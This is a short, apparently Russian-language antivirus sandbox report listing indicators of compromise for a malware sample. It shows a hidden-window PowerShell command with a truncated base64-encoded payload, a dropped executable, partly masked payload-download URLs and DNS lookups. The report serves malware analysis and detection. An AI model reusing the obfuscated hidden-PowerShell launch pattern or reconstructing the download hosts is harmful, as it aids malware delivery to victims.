Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABFAGYAbQBoAHIAbwBsAGkAdwBrAGwAbgA9ACcASQBsAGQAeQB2AGUAbwBuAHQAcABuAG0AJwA7ACQAUwB5AG4AZQB2AHkAawBkACAAPQAgACcAMQAyADYAJwA7ACQAQgBnAHYAagByAGYAcgBlAGkAPQAnAEgAYQBsAHgAcgBlAG4AdwB...
- %HOMEPATH%\126.exe
- %HOMEPATH%\126.exe
- http://ca####resources.com/wp/h6QS56G/
- http://ww#.###iroresources.com/wp/h6QS56G/?su#######################################
- http://is##ue.com/correo/knTR340119/
- http://do###vorot.su/wp-includes/Uz9DnP/
- DNS ASK da###gks.com
- DNS ASK ca####resources.com
- DNS ASK ww#.###iroresources.com
- DNS ASK id######.agenbolaterbaik.city
- DNS ASK is##ue.com
- DNS ASK do###vorot.su
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABFAGYAbQBoAHIAbwBsAGkAdwBrAGwAbgA9ACcASQBsAGQAeQB2AGUAbwBuAHQAcABuAG0AJwA7ACQAUwB5AG4AZQB2AHkAawBkACAAPQAgACcAMQAyADYAJwA7ACQAQgBnAHYAagByAGYAcgBlAGkAPQAnAEgAYQBsAHgAcgBlAG4AdwB...' (со скрытым окном)